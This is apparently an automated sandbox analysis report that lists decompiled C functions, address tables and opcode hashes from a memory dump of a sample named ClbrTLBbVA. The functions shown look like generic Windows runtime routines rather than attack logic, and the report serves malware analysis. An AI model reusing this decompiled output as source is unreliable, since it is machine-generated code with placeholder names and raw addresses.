                                        0x01726ac5
                                        0x01726ac5
                                        0x01726aaf
                                        0x01726a40
                                        0x01726a26
                                        0x017269fe
                                        0x01726ace
                                        0x01726ad0
                                        0x01726ad3
                                        0x01726ad8
                                        0x01726adf
                                        0x01726adf
                                        0x01726ae8
                                        0x01726aef
                                        0x01726aef
                                        0x01726af9
                                        0x01726b06

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ed390fee67697be4b9a061b6ab75074e697102a787bde48dfbe674bf5ce5605
                                        • Instruction ID: c2903739b74e256553afc23da6aba79c1f1b8480535d06505fc5fc16b4da4c7d
                                        • Opcode Fuzzy Hash: 7ed390fee67697be4b9a061b6ab75074e697102a787bde48dfbe674bf5ce5605
                                        • Instruction Fuzzy Hash: 454179B1D01219AFDB24DFA9D940BEEFBF9EF48714F14812EE915A3240DB709906CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E3D43 Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E016B7B60(0, _t61, 0x16811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E016B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L016C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                        0x016e3d4c
                                        0x016e3d50
                                        0x016e3d55
                                        0x016e3d5e
                                        0x0171e79a
                                        0x00000000
                                        0x0171e79a
                                        0x016e3d68
                                        0x0171e789
                                        0x016e3d9d
                                        0x016e3da3
                                        0x016e3daf
                                        0x016e3db5
                                        0x016e3dbc
                                        0x016e3dc4
                                        0x016e3dc9
                                        0x016e3dce
                                        0x0171e7ae
                                        0x0171e7ae
                                        0x016e3dde
                                        0x016e3de2
                                        0x016e3de7
                                        0x016e3e0d
                                        0x016e3e13
                                        0x016e3e16
                                        0x016e3e1e
                                        0x016e3e25
                                        0x016e3e28
                                        0x00000000
                                        0x00000000
                                        0x016e3e2a
                                        0x016e3e2f
                                        0x016e3e37
                                        0x016e3e37
                                        0x00000000
                                        0x016e3e37
                                        0x016e3e31
                                        0x00000000
                                        0x016e3e31
                                        0x016e3e20
                                        0x016e3e20
                                        0x016e3e35
                                        0x00000000
                                        0x016e3de9
                                        0x016e3de9
                                        0x016e3de9
                                        0x016e3dee
                                        0x016e3dfd
                                        0x016e3dff
                                        0x016e3e02
                                        0x016e3e05
                                        0x016e3e05
                                        0x00000000
                                        0x016e3df0
                                        0x016e3de7
                                        0x0171e78f
                                        0x0171e794
                                        0x016e3d79
                                        0x016e3d84
                                        0x016e3d89
                                        0x016e3d8e
                                        0x00000000
                                        0x0171e7a4
                                        0x016e3d96
                                        0x016e3d9a
                                        0x00000000
                                        0x016e3d9a
                                        0x00000000
                                        0x0171e794
                                        0x016e3d6e
                                        0x016e3d73
                                        0x00000000
                                        0x0171e7b5
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 221d8f829ed9b52ff5c09f87cb9dbc026fc27620ac2a9c28b835d25a8c427ef1
                                        • Instruction ID: 5655c6dbf2fe3257826e751c66cbc270b1ed0502fbca60f8cc2b8a00470675a3
                                        • Opcode Fuzzy Hash: 221d8f829ed9b52ff5c09f87cb9dbc026fc27620ac2a9c28b835d25a8c427ef1
                                        • Instruction Fuzzy Hash: BD31D032A02615DBD7258F2ECC49A7ABBF5FF85700B05816EE945CB360EB31D841C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DA61C Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E016DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1780220);
				E016FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1797b9c; // 0x0
				_t55 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E016FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1797b10 =  *0x1797b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x179536c; // 0x77995368
					if( *_t51 != 0x1795368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1795368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x179536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E016DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                        0x016da61c
                                        0x016da61e
                                        0x016da623
                                        0x016da628
                                        0x016da62b
                                        0x016da62d
                                        0x016da648
                                        0x016da64a
                                        0x016da64f
                                        0x01719b44
                                        0x016da6ec
                                        0x016da6f1
                                        0x016da6f1
                                        0x016da655
                                        0x016da657
                                        0x016da65a
                                        0x016da65d
                                        0x016da662
                                        0x016da663
                                        0x016da667
                                        0x016da668
                                        0x016da66d
                                        0x016da706
                                        0x016da706
                                        0x01719bda
                                        0x01719be6
                                        0x01719beb
                                        0x00000000
                                        0x01719beb
                                        0x016da679
                                        0x01719b7a
                                        0x00000000
                                        0x01719b7a
                                        0x016da683
                                        0x016da6f4
                                        0x016da6f7
                                        0x016da6f9
                                        0x016da6fd
                                        0x016da6a0
                                        0x016da6a0
                                        0x016da6ad
                                        0x016da6af
                                        0x016da6b4
                                        0x01719ba7
                                        0x01719bac
                                        0x00000000
                                        0x00000000
                                        0x01719bc6
                                        0x01719bce
                                        0x01719bd1
                                        0x01719bd3
                                        0x01719bd3
                                        0x00000000
                                        0x01719bd1
                                        0x016da6bd
                                        0x016da6c3
                                        0x016da6c6
                                        0x016da6d2
                                        0x016da701
                                        0x016da704
                                        0x00000000
                                        0x016da704
                                        0x016da6d4
                                        0x016da6d6
                                        0x016da6d9
                                        0x016da6db
                                        0x016da6e1
                                        0x016da6e6
                                        0x016da6e8
                                        0x016da6e8
                                        0x016da6ea
                                        0x00000000
                                        0x016da6ea
                                        0x016da688
                                        0x016da692
                                        0x016da694
                                        0x016da699
                                        0x00000000
                                        0x00000000
                                        0x016da69d
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66b96427ced1b786362675fd9a519a4578ba3c4b59a02e3a5e6bd376c63eedf0
                                        • Instruction ID: 9fdfa70d5399c43087f482bb7cb00823b32319bc6a19b53166a03d6181047329
                                        • Opcode Fuzzy Hash: 66b96427ced1b786362675fd9a519a4578ba3c4b59a02e3a5e6bd376c63eedf0
                                        • Instruction Fuzzy Hash: D04179B5E04215DFCB15CFA8C890BA9BBF2BB49314F15C1ADEA05AB344C775A902CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016CC182 Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E016CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E016C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01778D34(_v8, _t80);
					}
					E016C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E016BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01778833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E016BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E016EB180();
						if(_a4 != 0) {
							E016C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E016CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E016CBB2D(_t16, _t15);
						E016CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E016BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E016BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E016BFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                        0x016cc18d
                                        0x016cc18f
                                        0x016cc191
                                        0x016cc19b
                                        0x016cc1a0
                                        0x016cc1d4
                                        0x016cc1de
                                        0x01712d6e
                                        0x016cc1e4
                                        0x016cc1e4
                                        0x016cc1e4
                                        0x016cc1ec
                                        0x01712d7d
                                        0x01712d7d
                                        0x016cc1f3
                                        0x016cc1ff
                                        0x01712d88
                                        0x01712d8d
                                        0x01712d94
                                        0x01712d94
                                        0x01712d9f
                                        0x01712da4
                                        0x01712dab
                                        0x01712db0
                                        0x01712db2
                                        0x01712db3
                                        0x01712db4
                                        0x01712dbc
                                        0x01712dc3
                                        0x01712dc3
                                        0x016cc205
                                        0x016cc205
                                        0x016cc208
                                        0x016cc20e
                                        0x016cc211
                                        0x016cc216
                                        0x016cc219
                                        0x016cc21f
                                        0x016cc222
                                        0x016cc22c
                                        0x016cc234
                                        0x016cc23a
                                        0x016cc23f
                                        0x016cc245
                                        0x016cc24b
                                        0x016cc251
                                        0x016cc25a
                                        0x016cc276
                                        0x016cc27d
                                        0x016cc27d
                                        0x016cc25c
                                        0x016cc25c
                                        0x00000000
                                        0x016cc25e
                                        0x016cc1a4
                                        0x016cc1aa
                                        0x016cc1b3
                                        0x016cc265
                                        0x016cc26c
                                        0x016cc26c
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                        • Instruction ID: e235a169ad9131ae4dd698916eb60e23799422401d9c8acc1fcd06e7356ed8d6
                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                        • Instruction Fuzzy Hash: 15310172A01547AAD705EBB8CC90BF9FB5AFF52604F14815EC41C87302DB386A4ACBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01727016 Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 76%
                                        			E01727016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x179d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01726B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01726B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E016C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E016E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E016EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L016C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                        0x01727016
                                        0x0172701e
                                        0x0172702b
                                        0x01727033
                                        0x01727037
                                        0x0172703c
                                        0x0172703e
                                        0x01727041
                                        0x01727045
                                        0x0172704a
                                        0x01727050
                                        0x01727055
                                        0x0172705a
                                        0x01727062
                                        0x01727062
                                        0x0172705a
                                        0x01727064
                                        0x01727064
                                        0x01727067
                                        0x01727071
                                        0x01727096
                                        0x0172709b
                                        0x017270a2
                                        0x017270a6
                                        0x017270a7
                                        0x017270ad
                                        0x017270b3
                                        0x017270b6
                                        0x017270bb
                                        0x017270c3
                                        0x017270c3
                                        0x017270c6
                                        0x017270cd
                                        0x017270dd
                                        0x017270e0
                                        0x017270e2
                                        0x017270e2
                                        0x017270ee
                                        0x01727101
                                        0x017270f0
                                        0x017270f9
                                        0x017270f9
                                        0x0172710a
                                        0x0172710e
                                        0x01727112
                                        0x01727117
                                        0x01727118
                                        0x01727118
                                        0x017270bb
                                        0x0172711d
                                        0x01727123
                                        0x01727131
                                        0x01727131
                                        0x01727136
                                        0x0172713d
                                        0x0172713e
                                        0x0172713f
                                        0x0172714a
                                        0x0172714a
                                        0x01727084
                                        0x01727088
                                        0x00000000
                                        0x0172708e
                                        0x0172708e
                                        0x01727092
                                        0x00000000
                                        0x01727092

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01936e6aa9d72dac02ae7a6f5d29c46840f06728b626a7720499664b40250f76
                                        • Instruction ID: a6f61ce236b5b86ccb65a216ba8a344501cd25390fd1e6d5ce9db4e4243bb350
                                        • Opcode Fuzzy Hash: 01936e6aa9d72dac02ae7a6f5d29c46840f06728b626a7720499664b40250f76
                                        • Instruction Fuzzy Hash: D131C4726047A19BC324DF68CD40A6AF7E6FFD8700F144A2DF99587690E730E905CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DA70E Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E016DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1797b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1797b10 = 8;
					 *0x1797b14 = 0x1797b0c;
					 *0x1797b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E016DA990(0x1797b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L016DA840(__edx, __ecx, __ecx, _t52, 0x1797b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1797b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1797b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1797b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L016C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1797b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E016EF3E0(_t50,  *0x1797b14, _t8 >> 3);
						_t28 =  *0x1797b14; // 0x0
						__eflags = _t28 - 0x1797b0c;
						if(_t28 != 0x1797b0c) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1797b14 = _t50;
						_t48 = _v12;
						 *0x1797b10 = _t9;
						goto L6;
					}
					 *0x1797b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                        0x016da713
                                        0x016da714
                                        0x016da717
                                        0x016da71d
                                        0x016da720
                                        0x016da722
                                        0x016da727
                                        0x016da74a
                                        0x016da754
                                        0x016da75e
                                        0x016da768
                                        0x016da76a
                                        0x016da773
                                        0x016da78b
                                        0x016da790
                                        0x016da792
                                        0x016da741
                                        0x016da741
                                        0x016da743
                                        0x016da749
                                        0x016da749
                                        0x016da732
                                        0x016da73a
                                        0x016da797
                                        0x016da79d
                                        0x016da7a3
                                        0x016da7a9
                                        0x016da7b6
                                        0x016da7bc
                                        0x016da7ca
                                        0x016da7e0
                                        0x016da7e2
                                        0x016da7e4
                                        0x01719bf2
                                        0x00000000
                                        0x01719bf2
                                        0x016da7ed
                                        0x016da7f2
                                        0x016da800
                                        0x016da805
                                        0x016da80d
                                        0x016da812
                                        0x01719c08
                                        0x01719c08
                                        0x016da818
                                        0x016da81b
                                        0x016da821
                                        0x016da824
                                        0x00000000
                                        0x016da824
                                        0x016da7ae
                                        0x00000000
                                        0x016da7ae
                                        0x016da73c
                                        0x016da73e
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27f80490f9958d4e0d3c7a1b1ce1c85f50a42a310dad08e27d80a9a7f6629000
                                        • Instruction ID: 3f4ff2f8453fc9b0adff9d0f6cc07bd2c930f0361faaad828c578d8997a57f80
                                        • Opcode Fuzzy Hash: 27f80490f9958d4e0d3c7a1b1ce1c85f50a42a310dad08e27d80a9a7f6629000
                                        • Instruction Fuzzy Hash: 0831E1B5A282059FC729CF48EC90F65BBFAFB85720F15895AE20587344D7B0990ACF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D61A0 Relevance: .1, Instructions: 93COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E016D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E016D5E50(0x16867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01779D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E016AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                        0x016d61b3
                                        0x016d61b5
                                        0x016d61bd
                                        0x016d61c3
                                        0x016d61c7
                                        0x016d61d2
                                        0x016d61ff
                                        0x016d61ff
                                        0x016d6201
                                        0x016d6207
                                        0x016d6207
                                        0x016d61d4
                                        0x016d61d9
                                        0x00000000
                                        0x00000000
                                        0x016d61df
                                        0x016d61e2
                                        0x00000000
                                        0x00000000
                                        0x016d61e6
                                        0x016d61e8
                                        0x016d61ee
                                        0x016d61ee
                                        0x016d61f9
                                        0x0171762f
                                        0x01717632
                                        0x01717635
                                        0x01717639
                                        0x01717640
                                        0x0171766e
                                        0x01717675
                                        0x00000000
                                        0x00000000
                                        0x01717681
                                        0x01717689
                                        0x0171768d
                                        0x01717691
                                        0x01717695
                                        0x01717699
                                        0x017176af
                                        0x017176b5
                                        0x017176b7
                                        0x017176b7
                                        0x017176d7
                                        0x017176dc
                                        0x00000000
                                        0x017176dc
                                        0x017176a2
                                        0x017176a9
                                        0x01717651
                                        0x01717653
                                        0x01717653
                                        0x01717656
                                        0x01717656
                                        0x00000000
                                        0x01717656
                                        0x01717644
                                        0x01717646
                                        0x01717648
                                        0x01717648
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
